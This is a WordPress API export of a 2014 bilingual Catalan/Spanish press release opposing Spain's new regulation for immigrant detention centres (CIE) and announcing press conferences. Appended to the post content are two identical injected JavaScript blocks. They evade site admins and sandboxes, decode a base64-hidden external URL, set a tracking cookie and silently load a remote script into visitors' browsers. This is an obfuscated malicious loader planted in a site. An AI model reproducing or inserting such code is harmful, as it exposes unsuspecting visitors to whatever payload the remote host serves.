{"id":1025,"date":"2014-03-17T19:32:18","date_gmt":"2014-03-17T19:32:18","guid":{"rendered":"http:\/\/www.damne.net\/?p=1025"},"modified":"2026-01-19T23:27:42","modified_gmt":"2026-01-19T23:27:42","slug":"nota-de-premsa-arran-de-laprovacio-del-nou-reglament-dels-cies","status":"publish","type":"post","link":"https:\/\/www.damne.net\/?p=1025","title":{"rendered":"Nota de premsa arran de l&#8217;aprovaci\u00f3 del nou reglament dels CIEs"},"content":{"rendered":"<p><iframe loading=\"lazy\" src=\"\/\/e.issuu.com\/embed.html#0\/7134694\" width=\"700\" height=\"495\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p><strong>No al Reglament de la Vergonya!<\/strong><\/p>\n<p style=\"text-align: justify;\">Comunicat de la Campanya Estatal pel tancament dels CIE davant l&#8217;aprovaci\u00f3 del Reial Decret mitjan\u00e7ant el qual s&#8217;aprova el Reglament de funcionament i r\u00e8gim intern dels Centres d&#8217;internament d&#8217;Estrangers i convocat\u00f2ria de roda de premsa<\/p>\n<p style=\"text-align: justify;\">Poc despr\u00e9s de les morts de la Samba Martine al CIE d&#8217;Aluche (desembre de 2011) i de l&#8217;Idrissa Diallo al CIE de Zona Franca (gener de 2012), el Govern va anunciar la imminent aprovaci\u00f3 d&#8217;un Reglament per a regular el funcionament i r\u00e8gim intern dels Centres d&#8217;Internament. En aquell moment, aquestes dues morts, m\u00e9s la successi\u00f3 ininterrompuda d&#8217;informes que documentaven la vulneraci\u00f3 de drets fonamentals a l&#8217;interior d&#8217;aquests centres de la vergonya, van provocar que el Govern cit\u00e9s a les organitzacions socials a una consulta sobre aquest projecte de reglament.<\/p>\n<p style=\"text-align: justify;\">Tot i aix\u00ed, les morts es solapen i no s\u00f3n sin\u00f3 la punta de l&#8217;iceberg de la vulneraci\u00f3 de drets que suposen les pol\u00edtiques migrat\u00f2ries i l&#8217;entramat que les sustenta: batudes, internaments i expulsions. Amb la mort de l&#8217;Alik, l&#8217;any passat i, ara amb les 15 morts a Ceuta (encara sense aclarir) reapareix en un nou intent de legitimar la barb\u00e0rie mitjan\u00e7ant transformacions legals. En aquest sentit, les declaracions del Ministre d&#8217;Interior en el transcurs de la roda de premsa d&#8217;avui no fan sin\u00f3 evidenciar una concepci\u00f3 de la migraci\u00f3 en termes criminalitzadors, b\u00e8lics i inhumans,<\/p>\n<p style=\"text-align: justify;\">El Reglament presentat pel Govern mant\u00e9 el monopoli del Ministeri d&#8217;Interior sobre el control dels CIE, consolida el model de gesti\u00f3 policial i concentra l&#8217;autoritat en el Director, tamb\u00e9 funcionari policial. Els drets de les persones internes s\u00f3n supeditats als criteris policials de seguretat i control, una pr\u00e0ctica policial consolidada durant quasi b\u00e9 tres d\u00e8cades d&#8217;exist\u00e8ncia, caracteritzada per l&#8217;opacitat, l&#8217;arbitrarietat, l&#8217;ab\u00fas i la impunitat, i que ha tingut conseq\u00fc\u00e8ncies fatals pels drets i la integritat de les persones internes i el seu entorn social.<\/p>\n<p style=\"text-align: justify;\">A m\u00e9s a m\u00e9s, el Reglament obre les portes a privatitzar i subcontractar tota l&#8217;assist\u00e8ncia social. Conforme l&#8217;experi\u00e8ncia acumulada, les organitzacions independents podem afirmar que les subcontractes no han previngut les morts ni el patiment hum\u00e0 que suposa l&#8217;exclusi\u00f3, persecuci\u00f3, reclusi\u00f3 i deportaci\u00f3 d&#8217;\u00e9ssers humans. Cap organitzaci\u00f3 social que de veritat defensi els Drets Humans entrar\u00e0 a negociar la gesti\u00f3 d&#8217;aquests camps en que es produeixen violacions de drets di\u00e0ries.<\/p>\n<p style=\"text-align: justify;\">Per aquestes raons, les diferents organitzacions i col\u00b7lectius socials de la Capanya Estatal pel Tancaments dels Centres d&#8217;internament d&#8217;Estrangers, considerem que aquest intent de legitimitzaci\u00f3 i consolidaci\u00f3 del model policial en forma de reglament en cap cas suposar\u00e0 el canvi de naturalesa d&#8217;aquests centres. Per aix\u00f2 mostrem el nostre m\u00e9s absolut rebuig cap al Reial Decret mitja\u00e7ant el qual s&#8217;aprova el Reglament de funcionament i r\u00e8gim interior dels Centres d&#8217;Internament d&#8217;Estrangers (CIE), donat que resulta intolerable la implantaci\u00f3 del racisme institucional i l&#8217;exclusi\u00f3 d&#8217;\u00e9ssers humans en camps d&#8217;internament.<\/p>\n<p style=\"text-align: justify;\">Les organitzacions socials sotasignants creiem fermament que no es pot regular all\u00f2 que no hauria d&#8217;existir. D&#8217;igual forma, entenem que la nostra labor en aquests llocs, que amb la seva mera exist\u00e8ncia vulneren els Drets Humans, no consisteix en donar assist\u00e8ncia, ni gestionar-los sin\u00f3 en la den\u00fancia activa de les injust\u00edcies que es cometen amb l&#8217;objectiu \u00faltim d&#8217;aconseguir el seu tancament.<\/p>\n<p><strong>Pel tancament immediat i definitiu dels CIEs<\/strong><\/p>\n<p><strong>Contra el #ReglamentoVerg\u00fcenza<\/strong><\/p>\n<p>Per aix\u00f2 convoquem als mitjans el pr\u00f2xim 18 de mar\u00e7 a les respectives rodes de premsa on donarem compte de les implicacions d&#8217;aquest reglament i la convocat\u00f2ria d&#8217;accions per tot l&#8217;Estat:<\/p>\n<p>Barcelona: Facultat de Geografia i Hist\u00f2ria de la UB. Aula 209. c\/ Montalegre, 6 (Raval), 11 h.<\/p>\n<p>Madrid: carrer Embajadores 35 -bajo-, Llibreria Traficantes de Sue\u00f1os, 11 h.<\/p>\n<p><a href=\"http:\/\/tanquemelscies.blogspot.com.es\/2014\/03\/nota-de-premsa-arran-de-laprovacio-del.html#more\">http:\/\/tanquemelscies.blogspot.com.es\/2014\/03\/nota-de-premsa-arran-de-laprovacio-del.html#more<\/a><\/p>\n<p>[CAST]<\/p>\n<p><strong>\u00a1No al Reglamento de la Verg\u00fcenza!<\/strong><\/p>\n<p style=\"text-align: justify;\">Comunicado de la Campa\u00f1a Estatal por el cierre de los CIE ante la aprobaci\u00f3n del Real Decreto mediante el que se aprueba el Reglamento de funcionamiento y r\u00e9gimen interior de los Centros de Internamiento de Extranjeros (CIE) y convocatoria de rueda de prensa.<\/p>\n<p style=\"text-align: justify;\">Poco despu\u00e9s de las muertes de Samba Martine en el CIE de Aluche (diciembre de 2011) y de Idrissa Diallo en el CIE de Zona Franca (enero de 2012), el Gobierno anunci\u00f3 la inminente aprobaci\u00f3n de un Reglamento para regular el funcionamiento y r\u00e9gimen interno de los Centros de Internamiento. En aquel momento, estas dos muertes, m\u00e1s la sucesi\u00f3n ininterrumpida de informes que documentaban la vulneraci\u00f3n de derechos fundamentales en el interior de estos centros de la verg\u00fcenza, provocaron que el Gobierno llamase a las organizaciones sociales a una consulta sobre dicho proyecto de Reglamento.<\/p>\n<p style=\"text-align: justify;\">Sin embargo, los fallecimientos se solapan y no son sino la punta del iceberg de la vulneraci\u00f3n de derechos que suponen las pol\u00edticas migratorias y el entramado que las sustenta: redadas, internamientos y expulsiones. Con la muerte de Alik, el pasado a\u00f1o y, ahora, con las 15 muertes en Ceuta (a\u00fan sin esclarecer) reaparece un nuevo intento de legitimar la barbarie mediante trasformaciones legales. En este sentido, las declaraciones del Ministro de Interior en el transcurso de la rueda de prensa de hoy no hacen sino evidenciar una concepci\u00f3n de la migraci\u00f3n en t\u00e9rminos criminalizadores, b\u00e9licos e inhumanos.<\/p>\n<p style=\"text-align: justify;\">El Reglamento presentado por el Gobierno mantiene el monopolio del Ministerio del Interior sobre el control de los CIE, consolida el modelo de gesti\u00f3n policial y concentra la autoridad en el Director, tambi\u00e9n funcionario policial. Los derechos de las personas internas son supeditados a los criterios policiales de seguridad y control, una pr\u00e1ctica policial consolidada durante casi tres d\u00e9cadas de existencia, caracterizada por la opacidad, arbitrariedad, el abuso y la impunidad, y que ha tenido consecuencias fatales para los derechos y la integridad de las personas internas y su entorno social.<\/p>\n<p style=\"text-align: justify;\">Adem\u00e1s, el Reglamento abre las puertas a privatizar y subcontratar toda la asistencia social. Conforme a la experiencia acumulada, las organizaciones independientes podemos afirmar que las subcontratas no han prevenido las muertes ni el sufrimiento humano que supone la exclusi\u00f3n, persecuci\u00f3n, reclusi\u00f3n y deportaci\u00f3n de seres humanos. Ninguna organizaci\u00f3n social que de verdad defienda los Derechos Humanos entrar\u00e1 a negociar la gesti\u00f3n de estos campos en los que se producen violaciones de derechos diarias.<\/p>\n<p style=\"text-align: justify;\">Por estas razones, las diferentes organizaciones y colectivos sociales de la Campa\u00f1a Estatal por el Cierre de los Centros de Internamiento de Extranjeros, consideramos que este intento de legitimaci\u00f3n y consolidaci\u00f3n del modelo policial en forma de reglamento en ning\u00fan caso va a suponer el cambio de naturaleza de estos centros.<br \/>\nPor ello mostramos nuestro m\u00e1s absoluto rechazo al Real Decreto mediante el que se aprueba el Reglamento de funcionamiento y r\u00e9gimen interior de los Centros de Internamiento de Extranjeros (CIE) , puesto que resulta intolerable la implantaci\u00f3n del racismo institucional y la exclusi\u00f3n de seres humanos en campos de internamiento.<\/p>\n<p style=\"text-align: justify;\">Las organizaciones sociales firmantes creemos firmemente que no se puede regular aquello que no deber\u00eda existir. De igual forma, entendemos que nuestra labor en estos lugares, que con su mera existencia suponen una vulneran los Derechos Humanos, no consiste ni en prestar asistencia, ni gestionarlos, sino en la denuncia activa de las injusticias que se acometen con el objetivo \u00faltimo de lograr su cierre.<\/p>\n<p><strong>Contra el #ReglamentoVerg\u00fcenza<\/strong><\/p>\n<p><strong>Por el cierre inmediato y definitivo de los CIE<\/strong><\/p>\n<p>Por ello convocamos a los medios el pr\u00f3ximo 18 de marzo a sendas ruedas de prensa en las que daremos cuenta de las implicaciones de esta reglamentaci\u00f3n y la convocatoria de acciones por todo el Estado:<\/p>\n<p>Barcelona: Facultat de Geografia i Hist\u00f2ria de la UB. Aula 209. c\/ Montalegre, 6 (Raval), 11 h.<\/p>\n<p>Madrid: calle Embajadores 35 -bajo-, Llibrer\u00eda Traficantes de Sue\u00f1os, 11 h.<\/p>\n<p><a href=\"http:\/\/tanquemelscies.blogspot.com.es\/2014\/03\/nota-de-premsa-arran-de-laprovacio-del.html#more\">http:\/\/tanquemelscies.blogspot.com.es\/2014\/03\/nota-de-premsa-arran-de-laprovacio-del.html#more<\/a><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>No al Reglament de la Vergonya!<br \/>\nPel tancament immediat i definitiu dels CIEs<\/p>\n<p>Comunicat de la Campanya Estatal pel tancament dels CIE davant l&#8217;aprovaci\u00f3 del Reial Decret mitjan\u00e7ant el qual s&#8217;aprova el Reglament de funcionament i r\u00e8gim intern dels Centres d&#8217;internament d&#8217;Estrangers i convocat\u00f2ria de roda de premsa<\/p>\n<p>18\/03\/2014<br \/>\nBarcelona: Facultat de Geografia i Hist\u00f2ria de la UB. Aula 209. c\/ Montalegre, 6 (Raval), 11 h.<br \/>\nMadrid: carrer Embajadores 35 -bajo-, Llibreria Traficantes de Sue\u00f1os, 11 h.<\/p>\n<p>http:\/\/tanquemelscies.blogspot.com.es<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[5,3],"tags":[],"_links":{"self":[{"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/posts\/1025"}],"collection":[{"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.damne.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1025"}],"version-history":[{"count":8,"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/posts\/1025\/revisions"}],"predecessor-version":[{"id":5043,"href":"https:\/\/www.damne.net\/index.php?rest_route=\/wp\/v2\/posts\/1025\/revisions\/5043"}],"wp:attachment":[{"href":"https:\/\/www.damne.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1025"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.damne.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1025"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.damne.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1025"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}